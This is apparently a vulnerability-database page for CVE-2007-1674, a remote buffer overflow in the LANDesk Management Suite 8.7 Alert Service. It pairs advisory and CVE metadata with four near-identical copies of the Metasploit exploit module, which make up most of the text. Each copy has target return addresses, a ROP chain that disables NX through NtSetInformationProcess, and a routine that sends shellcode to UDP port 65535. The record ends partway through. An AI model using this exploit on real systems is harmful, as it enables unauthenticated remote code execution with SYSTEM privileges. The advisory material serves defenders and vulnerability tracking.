LANDesk Management Suite automates systems and security management tasks across a network. It runs an Alert Service which listens for communication on port 65535/UDP.
Problem
A buffer overflow vulnerability in the Alert Service allows remote attackers to execute arbitrary commands.
{"id": "SAINT:30DCBC896731FBD4CF542016E45DF1E6", "bulletinFamily": "exploit", "title": "LANDesk Management Suite Alert Service buffer overflow", "description": "Added: 04/23/2007 \nCVE: [CVE-2007-1674](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1674>) \nBID: [23483](<http://www.securityfocus.com/bid/23483>) \nOSVDB: [34964](<http://www.osvdb.org/34964>) \n\n\n### Background\n\n[LANDesk Management Suite](<http://www.landesk.com/SolutionServices/product.aspx?id=716>) automates systems and security management tasks across a network. It runs an Alert Service which listens for communication on port 65535/UDP. \n\n### Problem\n\nA buffer overflow vulnerability in the Alert Service allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply the [hotfix](<http://kb.landesk.com/al/12/4/article.asp?aid=4142&bt=4>). \n\n### References\n\n<http://www.tippingpoint.com/security/advisories/TSRT-07-04.html> \n\n\n### Limitations\n\nExploit works on LANDesk Management Suite 8.7. \n\n### Platforms\n\nWindows \n \n\n", "published": "2007-04-23T00:00:00", "modified": "2007-04-23T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/landesk_management_alert", "reporter": "SAINT Corporation", "references": [], "cvelist": ["CVE-2007-1674"], "type": "saint", "lastseen": "2019-06-04T23:19:33", "edition": 4, "viewCount": 13, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-1674"]}, {"type": "osvdb", "idList": ["OSVDB:34964"]}, {"type": "saint", "idList": ["SAINT:6A16F163E51E2A2CD2966435791BC8BF", "SAINT:2B7129FC7A7C52602762255B22D8DAD2"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/MISC/LANDESK_AOLNSRVR"]}, {"type": "nessus", "idList": ["LANDESK_AOLNSRVR_OVERFLOW.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7581", "SECURITYVULNS:DOC:16707"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83169"]}, {"type": "exploitdb", "idList": ["EDB-ID:29853", "EDB-ID:16457"]}], "modified": "2019-06-04T23:19:33", "rev": 2}, "score": {"value": 10.0, "vector": "NONE", "modified": "2019-06-04T23:19:33", "rev": 2}, "vulnersScore": 10.0}, "scheme": null, "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:31:22", "description": "Stack-based buffer overflow in the Alert Service (aolnsrvr.exe) in LANDesk Management Suite 8.7 allows remote attackers to execute arbitrary code via a crafted packet to port 65535/UDP.", "edition": 4, "cvss3": {}, "published": "2007-04-18T03:19:00", "title": "CVE-2007-1674", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1674"], "modified": "2018-10-16T16:40:00", "cpe": ["cpe:/a:landesk:landesk_management_suite:8.7"], "id": "CVE-2007-1674", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1674", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:landesk:landesk_management_suite:8.7:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1674"], "description": "Added: 04/23/2007 \nCVE: [CVE-2007-1674](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1674>) \nBID: [23483](<http://www.securityfocus.com/bid/23483>) \nOSVDB: [34964](<http://www.osvdb.org/34964>) \n\n\n### Background\n\n[LANDesk Management Suite](<http://www.landesk.com/SolutionServices/product.aspx?id=716>) automates systems and security management tasks across a network. It runs an Alert Service which listens for communication on port 65535/UDP. \n\n### Problem\n\nA buffer overflow vulnerability in the Alert Service allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply the [hotfix](<http://kb.landesk.com/al/12/4/article.asp?aid=4142&bt=4>). \n\n### References\n\n<http://www.tippingpoint.com/security/advisories/TSRT-07-04.html> \n\n\n### Limitations\n\nExploit works on LANDesk Management Suite 8.7. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2007-04-23T00:00:00", "published": "2007-04-23T00:00:00", "id": "SAINT:6A16F163E51E2A2CD2966435791BC8BF", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/landesk_management_alert", "type": "saint", "title": "LANDesk Management Suite Alert Service buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:48", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1674"], "edition": 2, "description": "Added: 04/23/2007 \nCVE: [CVE-2007-1674](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1674>) \nBID: [23483](<http://www.securityfocus.com/bid/23483>) \nOSVDB: [34964](<http://www.osvdb.org/34964>) \n\n\n### Background\n\n[LANDesk Management Suite](<http://www.landesk.com/SolutionServices/product.aspx?id=716>) automates systems and security management tasks across a network. It runs an Alert Service which listens for communication on port 65535/UDP. \n\n### Problem\n\nA buffer overflow vulnerability in the Alert Service allows remote attackers to execute arbitrary commands. \n\n### Resolution\n\nApply the [hotfix](<http://kb.landesk.com/al/12/4/article.asp?aid=4142&bt=4>). \n\n### References\n\n<http://www.tippingpoint.com/security/advisories/TSRT-07-04.html> \n\n\n### Limitations\n\nExploit works on LANDesk Management Suite 8.7. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2007-04-23T00:00:00", "published": "2007-04-23T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/landesk_management_alert", "id": "SAINT:2B7129FC7A7C52602762255B22D8DAD2", "type": "saint", "title": "LANDesk Management Suite Alert Service buffer overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:19:53", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "LANDesk Management Suite 8.7 Alert Service Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1674"], "modified": "2009-11-26T00:00:00", "id": "PACKETSTORM:83169", "href": "https://packetstormsecurity.com/files/83169/LANDesk-Management-Suite-8.7-Alert-Service-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Udp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'LANDesk Management Suite 8.7 Alert Service Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in LANDesk Management Suite 8.7. By sending \nan overly long string to the Alert Service, a buffer is overwritten and arbitrary \ncode can be executed. \n}, \n'Author' => 'MC', \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2007-1674'], \n['OSVDB', '34964'], \n['URL', 'http://www.tippingpoint.com/security/advisories/TSRT-07-04.html'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Payload' => \n{ \n'Space' => 336, \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n# Aolnsrvr 4.0 \n[ 'Alerting Proxy 2000/2003/XP', { 'Ret' => 0x00423554 } ], \n[ 'Alerting Proxy 2003 SP1-2 (NX support)', { 'IB' => 0x00400000, 'ProcessInfo' => 0xed } ], \n[ 'Alerting Proxy XP SP2 (NX support)', { 'IB' => 0x00400000, 'ProcessInfo' => 0xe4 } ], \n], \n'Privileged' => true, \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Apr 13 2007')) \n \nregister_options([Opt::RPORT(65535)], self.class) \n \nend \n \ndef exploit \nconnect_udp \n \nif (target.name =~ /NX/) \ntxt = Rex::Text.rand_text_alphanumeric(1024) \n \nib = target['IB'] \n \n# to bypass NX we need to emulate the call to ZwSetInformationProcess \n# with generic value (to work on 2k3 SP1-SP2 - XP SP2) \n \n \n# first we set esi to 0xed by getting the value on the stack \n# \n# 0x00401b46: \n# pop esi <- esi = edh \n# retn \n \ntxt[ 280, 4 ] = [ib + 0x1b46].pack('V') \ntxt[ 296, 4] = [0xed].pack('V') \n \n# now we set ecx to 0x7ffe0300, eax to 0xed \n# 0x00401b43: \n# pop ecx <- ecx = 0x7ffe0300 - 0xFF0 \n# mov eax, esi <- eax == edh \n# pop esi <- 0x45b4ea (data section) \n# retn \n \ntxt[ 300, 4] = [ib + 0x1b43].pack('V') \ntxt[ 304, 4] = [0x7ffe0300 - 0xff0].pack('V') \ntxt[ 308, 4] = [ib + 0x5b4ea].pack('V') \n \n# we set edx to 0x7FFe300 (ecx + 0xff0) \n# 0x004106b1: \n# lea edx, [ecx+0ff0h] \n# mov [esi+4], edx \n# mov [esi+8], edi \n# pop edi \n# mov [esi+0Ch], eax \n# pop esi \n# retn \n \ntxt[ 312, 4] = [ib + 0x106b1].pack('V') \n \n \n# finally we call NtSetInformationProcess (-1, target['ProcessInfo'], ib+0x4ec84, 4) \n# 0x0044ec84 is a pointer to 0x2 to disable NX \n# 0x0042a28e: \n# call dword ptr [edx] \n# mov esi, eax \n# mov eax, esi \n# pop edi \n# pop esi \n# pop ebp \n# pop ebx \n# add esp, 134h \n# retn 1Ch \n \ntxt[ 324, 4] = [ib + 0x2a28e].pack('V') # call dword ptr[ecx] \ntxt[ 332, 16] = [-1, 34, 0x0044ec84, 4].pack('VVVV') \n \n# we catch the second exception to go back to our shellcode, now that \n# NX is disabled \n \ntxt[ 652, 4 ] = [ib + 0x23554].pack('V') # (jmp esp in atl.dll) \ntxt[ 684, payload.encoded.length ] = payload.encoded \n \nelse \n# One-shot overwrite =( \ntxt = rand_text_alphanumeric(280) + [target.ret].pack('V') + payload.encoded \nend \n \nprint_status(\"Trying target #{target.name}...\") \n \nudp_sock.put(txt) \n \nhandler(udp_sock) \ndisconnect_udp \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83169/landesk_aolnsrvr.rb.txt"}], "osvdb": [{"lastseen": "2017-04-28T13:20:31", "bulletinFamily": "software", "cvelist": ["CVE-2007-1674"], "description": "# No description provided by the source\n\n## References:\nVendor Specific News/Changelog Entry: http://kb.landesk.com/display/4n/kb/article.asp?aid=4142\nSecurity Tracker: 1017912\n[Secunia Advisory ID:24892](https://secuniaresearch.flexerasoftware.com/advisories/24892/)\nOther Advisory URL: http://www.tippingpoint.com/security/advisories/TSRT-07-04.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0212.html\nKeyword: UDP port 65535\nISS X-Force ID: 33657\nFrSIRT Advisory: ADV-2007-1391\n[CVE-2007-1674](https://vulners.com/cve/CVE-2007-1674)\nBugtraq ID: 23483\n", "edition": 1, "modified": "2007-04-13T05:19:07", "published": "2007-04-13T05:19:07", "href": "https://vulners.com/osvdb/OSVDB:34964", "id": "OSVDB:34964", "title": "LANDesk Management Suite Alert Service (aolnsrvr.exe) Remote Overflow", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-07-02T22:31:48", "description": "This module exploits a stack buffer overflow in LANDesk Management Suite 8.7. By sending an overly long string to the Alert Service, a buffer is overwritten and arbitrary code can be executed.\n", "published": "2007-04-15T00:46:09", "type": "metasploit", "title": "LANDesk Management Suite 8.7 Alert Service Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1674"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/MISC/LANDESK_AOLNSRVR", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Udp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'LANDesk Management Suite 8.7 Alert Service Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in LANDesk Management Suite 8.7. By sending\n an overly long string to the Alert Service, a buffer is overwritten and arbitrary\n code can be executed.\n },\n 'Author' => 'MC',\n 'References' =>\n [\n ['CVE', '2007-1674'],\n ['OSVDB', '34964'],\n ['URL', 'http://www.tippingpoint.com/security/advisories/TSRT-07-04.html'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 336,\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Aolnsrvr 4.0\n [ 'Alerting Proxy 2000/2003/XP', { 'Ret' => 0x00423554 } ],\n [ 'Alerting Proxy 2003 SP1-2 (NX support)', { 'IB' => 0x00400000, 'ProcessInfo' => 0xed } ],\n [ 'Alerting Proxy XP SP2 (NX support)', { 'IB' => 0x00400000, 'ProcessInfo' => 0xe4 } ],\n ],\n 'Privileged' => true,\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Apr 13 2007'))\n\n register_options([Opt::RPORT(65535)])\n end\n\n def exploit\n connect_udp\n\n if (target.name =~ /NX/)\n txt = Rex::Text.rand_text_alphanumeric(1024)\n\n ib = target['IB']\n\n # to bypass NX we need to emulate the call to ZwSetInformationProcess\n # with generic value (to work on 2k3 SP1-SP2 - XP SP2)\n\n\n # first we set esi to 0xed by getting the value on the stack\n #\n # 0x00401b46:\n # pop esi <- esi = edh\n # retn\n\n txt[ 280, 4 ] = [ib + 0x1b46].pack('V')\n txt[ 296, 4] = [0xed].pack('V')\n\n # now we set ecx to 0x7ffe0300, eax to 0xed\n # 0x00401b43:\n # pop ecx <- ecx = 0x7ffe0300 - 0xFF0\n # mov eax, esi <- eax == edh\n # pop esi <- 0x45b4ea (data section)\n # retn\n\n txt[ 300, 4] = [ib + 0x1b43].pack('V')\n txt[ 304, 4] = [0x7ffe0300 - 0xff0].pack('V')\n txt[ 308, 4] = [ib + 0x5b4ea].pack('V')\n\n # we set edx to 0x7FFe300 (ecx + 0xff0)\n # 0x004106b1:\n # lea edx, [ecx+0ff0h]\n # mov [esi+4], edx\n # mov [esi+8], edi\n # pop edi\n # mov [esi+0Ch], eax\n # pop esi\n # retn\n\n txt[ 312, 4] = [ib + 0x106b1].pack('V')\n\n\n # finally we call NtSetInformationProcess (-1, target['ProcessInfo'], ib+0x4ec84, 4)\n # 0x0044ec84 is a pointer to 0x2 to disable NX\n # 0x0042a28e:\n # call dword ptr [edx]\n # mov esi, eax\n # mov eax, esi\n # pop edi\n # pop esi\n # pop ebp\n # pop ebx\n # add esp, 134h\n # retn 1Ch\n\n txt[ 324, 4] = [ib + 0x2a28e].pack('V') # call dword ptr[ecx]\n txt[ 332, 16] = [-1, 34, 0x0044ec84, 4].pack('VVVV')\n\n # we catch the second exception to go back to our shellcode, now that\n # NX is disabled\n\n txt[ 652, 4 ] = [ib + 0x23554].pack('V') # (jmp esp in atl.dll)\n txt[ 684, payload.encoded.length ] = payload.encoded\n\n else\n # One-shot overwrite =(\n txt = rand_text_alphanumeric(280) + [target.ret].pack('V') + payload.encoded\n end\n\n print_status(\"Trying target #{target.name}...\")\n\n udp_sock.put(txt)\n\n handler(udp_sock)\n disconnect_udp\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/landesk_aolnsrvr.rb"}], "exploitdb": [{"lastseen": "2016-02-03T11:16:00", "description": "LanDesk Management Suite 8.7 Alert Service AOLSRVR.EXE Buffer Overflow Vulnerability. CVE-2007-1674. Remote exploit for windows platform", "published": "2007-04-13T00:00:00", "type": "exploitdb", "title": "LanDesk Management Suite 8.7 Alert Service AOLSRVR.EXE Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1674"], "modified": "2007-04-13T00:00:00", "id": "EDB-ID:29853", "href": "https://www.exploit-db.com/exploits/29853/", "sourceData": "source: http://www.securityfocus.com/bid/23483/info\r\n\r\nLANDesk Management Suite is prone to a remote stack-based buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.\r\n\r\nAn attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successfully exploiting this issue would result in the complete compromise of affected computers. Failed exploit attempts will result in a denial of service.\r\n\r\nThis issue affects LANDesk Management Suite 8.7; prior versions may also be affected. \r\n\r\n##\r\n# $Id: landesk_aolnsrvr.rb 4886 2007-05-07 04:48:45Z hdm $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/projects/Framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\nmodule Msf\r\n\r\nclass Exploits::Windows::Misc::Landesk_Aolnsrvr < Msf::Exploit::Remote\r\n\r\n\tinclude Exploit::Remote::Udp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'LANDesk Management Suite 8.7 Alert Service Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a stack overflow in LANDesk Management Suite 8.7. By sending\r\n\t\t\t\tan overly long string to the Alert Service, a buffer is overwritten and arbitrary\r\n\t\t\t\tcode can be executed.\r\n\t\t\t},\r\n\t\t\t'Author' => 'MC',\r\n\t\t\t'Version' => '$Revision: 4886 $',\r\n\t\t\t'References' => \r\n\t\t\t\t[ \r\n\t\t\t\t\t['CVE', '2007-1674'],\r\n\t\t\t\t\t['URL', 'http://www.tippingpoint.com/security/advisories/TSRT-07-04.html'],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 336,\r\n\t\t\t\t\t'StackAdjustment' => -3500,\t\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Aolnsrvr 4.0\r\n\t\t\t\t\t[ 'Alerting Proxy 2000/2003/XP', { 'Ret' => 0x00423554 } ],\r\n\t\t\t\t\t[ 'Alerting Proxy 2003 SP1-2 (NX support)', { 'IB' => 0x00400000, 'ProcessInfo' => 0xed } ],\r\n\t\t\t\t\t[ 'Alerting Proxy XP SP2 (NX support)', { 'IB' => 0x00400000, 'ProcessInfo' => 0xe4 } ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Apr 13 2007'))\r\n\r\n\t\t\tregister_options([Opt::RPORT(65535)], self.class)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect_udp\r\n\r\n\t\tif (target.name =~ /NX/)\r\n\t\t\ttxt = Rex::Text.rand_text_alphanumeric(1024)\r\n\r\n\t\t\tib = target['IB']\r\n\r\n\t\t\t# to bypass NX we need to emulate the call to ZwSetInformationProcess\r\n\t\t\t# with generic value (to work on 2k3 SP1-SP2 - XP SP2)\r\n\r\n\r\n\t\t\t# first we set esi to 0xed by getting the value on the stack\r\n\t\t\t#\r\n\t\t\t# 0x00401b46:\r\n\t\t\t# pop esi <- esi = edh\r\n\t\t\t# retn\r\n\r\n\t\t\ttxt[ 280, 4 ] = [ib + 0x1b46].pack('V')\r\n\t\t\ttxt[ 296, 4] = [0xed].pack('V')\r\n\r\n\t\t\t# now we set ecx to 0x7ffe0300, eax to 0xed\r\n\t\t\t# 0x00401b43:\r\n\t\t\t# pop ecx <- ecx = 0x7ffe0300 - 0xFF0\r\n\t\t\t# mov eax, esi <- eax == edh\r\n\t\t\t# pop esi <- 0x45b4ea (data section)\r\n\t\t\t# retn\r\n\r\n\t\t\ttxt[ 300, 4] = [ib + 0x1b43].pack('V')\r\n\t\t\ttxt[ 304, 4] = [0x7ffe0300 - 0xff0].pack('V')\r\n\t\t\ttxt[ 308, 4] = [ib + 0x5b4ea].pack('V')\r\n\r\n\t\t\t# we set edx to 0x7FFe300 (ecx + 0xff0)\r\n\t\t\t# 0x004106b1:\r\n\t\t\t# lea edx, [ecx+0ff0h]\r\n\t\t\t# mov [esi+4], edx\r\n\t\t\t# mov [esi+8], edi\r\n\t\t\t# pop edi\r\n\t\t\t# mov [esi+0Ch], eax\r\n\t\t\t# pop esi\r\n\t\t\t# retn\r\n\t\t\t\r\n\t\t\ttxt[ 312, 4] = [ib + 0x106b1].pack('V')\r\n\t\t\t\r\n\t\t\t\r\n\t\t\t# finally we call NtSetInformationProcess (-1, target['ProcessInfo'], ib+0x4ec84, 4)\r\n\t\t\t# 0x0044ec84 is a pointer to 0x2 to disable NX\r\n\t\t\t# 0x0042a28e:\r\n\t\t\t# call dword ptr [edx]\r\n\t\t\t# mov esi, eax\r\n\t\t\t# mov eax, esi\r\n\t\t\t# pop edi\r\n\t\t\t# pop esi\r\n\t\t\t# pop ebp\r\n\t\t\t# pop ebx\r\n\t\t\t# add esp, 134h\r\n\t\t\t# retn 1Ch\r\n\r\n\t\t\ttxt[ 324, 4] = [ib + 0x2a28e].pack('V') # call dword ptr[ecx]\r\n\t\t\ttxt[ 332, 16] = [-1, 34, 0x0044ec84, 4].pack('VVVV')\r\n\r\n\t\t\t# we catch the second exception to go back to our shellcode, now that\r\n\t\t\t# NX is disabled\r\n\r\n\t\t\ttxt[ 652, 4 ] = [ib + 0x23554].pack('V') # (jmp esp in atl.dll)\r\n\t\t\ttxt[ 684, payload.encoded.length ] = payload.encoded\r\n\r\n\t\telse\r\n\t\t\t# One-shot overwrite =(\r\n\t\t\ttxt = rand_text_alphanumeric(280) + [target.ret].pack('V') + payload.encoded\r\n\t\tend\r\n\t\t\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\t\t\t\r\n\t\tudp_sock.put(txt)\r\n\t\t\r\n\t\thandler(udp_sock)\r\n\t\tdisconnect_udp\t\t\r\n\tend\r\n\r\nend\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/29853/"}, {"lastseen": "2016-02-01T23:54:50", "description": "LANDesk Management Suite 8.7 Alert Service Buffer Overflow. CVE-2007-1674. Remote exploit for windows platform", "published": "2010-05-09T00:00:00", "type": "exploitdb", "title": "LANDesk Management Suite 8.7 Alert Service Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1674"], "modified": "2010-05-09T00:00:00", "id": "EDB-ID:16457", "href": "https://www.exploit-db.com/exploits/16457/", "sourceData": "##\r\n# $Id: landesk_aolnsrvr.rb 9262 2010-05-09 17:45:00Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = AverageRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Udp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'LANDesk Management Suite 8.7 Alert Service Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits a stack buffer overflow in LANDesk Management Suite 8.7. By sending\r\n\t\t\t\tan overly long string to the Alert Service, a buffer is overwritten and arbitrary\r\n\t\t\t\tcode can be executed.\r\n\t\t\t},\r\n\t\t\t'Author' => 'MC',\r\n\t\t\t'Version' => '$Revision: 9262 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2007-1674'],\r\n\t\t\t\t\t['OSVDB', '34964'],\r\n\t\t\t\t\t['URL', 'http://www.tippingpoint.com/security/advisories/TSRT-07-04.html'],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 336,\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Aolnsrvr 4.0\r\n\t\t\t\t\t[ 'Alerting Proxy 2000/2003/XP', { 'Ret' => 0x00423554 } ],\r\n\t\t\t\t\t[ 'Alerting Proxy 2003 SP1-2 (NX support)', { 'IB' => 0x00400000, 'ProcessInfo' => 0xed } ],\r\n\t\t\t\t\t[ 'Alerting Proxy XP SP2 (NX support)', { 'IB' => 0x00400000, 'ProcessInfo' => 0xe4 } ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Apr 13 2007'))\r\n\r\n\t\tregister_options([Opt::RPORT(65535)], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect_udp\r\n\r\n\t\tif (target.name =~ /NX/)\r\n\t\t\ttxt = Rex::Text.rand_text_alphanumeric(1024)\r\n\r\n\t\t\tib = target['IB']\r\n\r\n\t\t\t# to bypass NX we need to emulate the call to ZwSetInformationProcess\r\n\t\t\t# with generic value (to work on 2k3 SP1-SP2 - XP SP2)\r\n\r\n\r\n\t\t\t# first we set esi to 0xed by getting the value on the stack\r\n\t\t\t#\r\n\t\t\t# 0x00401b46:\r\n\t\t\t# pop esi <- esi = edh\r\n\t\t\t# retn\r\n\r\n\t\t\ttxt[ 280, 4 ] = [ib + 0x1b46].pack('V')\r\n\t\t\ttxt[ 296, 4] = [0xed].pack('V')\r\n\r\n\t\t\t# now we set ecx to 0x7ffe0300, eax to 0xed\r\n\t\t\t# 0x00401b43:\r\n\t\t\t# pop ecx <- ecx = 0x7ffe0300 - 0xFF0\r\n\t\t\t# mov eax, esi <- eax == edh\r\n\t\t\t# pop esi <- 0x45b4ea (data section)\r\n\t\t\t# retn\r\n\r\n\t\t\ttxt[ 300, 4] = [ib + 0x1b43].pack('V')\r\n\t\t\ttxt[ 304, 4] = [0x7ffe0300 - 0xff0].pack('V')\r\n\t\t\ttxt[ 308, 4] = [ib + 0x5b4ea].pack('V')\r\n\r\n\t\t\t# we set edx to 0x7FFe300 (ecx + 0xff0)\r\n\t\t\t# 0x004106b1:\r\n\t\t\t# lea edx, [ecx+0ff0h]\r\n\t\t\t# mov [esi+4], edx\r\n\t\t\t# mov [esi+8], edi\r\n\t\t\t# pop edi\r\n\t\t\t# mov [esi+0Ch], eax\r\n\t\t\t# pop esi\r\n\t\t\t# retn\r\n\r\n\t\t\ttxt[ 312, 4] = [ib + 0x106b1].pack('V')\r\n\r\n\r\n\t\t\t# finally we call NtSetInformationProcess (-1, target['ProcessInfo'], ib+0x4ec84, 4)\r\n\t\t\t# 0x0044ec84 is a pointer to 0x2 to disable NX\r\n\t\t\t# 0x0042a28e:\r\n\t\t\t# call dword ptr [edx]\r\n\t\t\t# mov esi, eax\r\n\t\t\t# mov eax, esi\r\n\t\t\t# pop edi\r\n\t\t\t# pop esi\r\n\t\t\t# pop ebp\r\n\t\t\t# pop ebx\r\n\t\t\t# add esp, 134h\r\n\t\t\t# retn 1Ch\r\n\r\n\t\t\ttxt[ 324, 4] = [ib + 0x2a28e].pack('V') # call dword ptr[ecx]\r\n\t\t\ttxt[ 332, 16] = [-1, 34, 0x0044ec84, 4].pack('VVVV')\r\n\r\n\t\t\t# we catch the second exception to go back to our shellcode, now that\r\n\t\t\t# NX is disabled\r\n\r\n\t\t\ttxt[ 652, 4 ] = [ib + 0x23554].pack('V') # (jmp esp in atl.dll)\r\n\t\t\ttxt[ 684, payload.encoded.length ] = payload.encoded\r\n\r\n\t\telse\r\n\t\t\t# One-shot overwrite =(\r\n\t\t\ttxt = rand_text_alphanumeric(280) + [target.ret].pack('V') + payload.encoded\r\n\t\tend\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tudp_sock.put(txt)\r\n\r\n\t\thandler(udp_sock)\r\n\t\tdisconnect_udp\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": 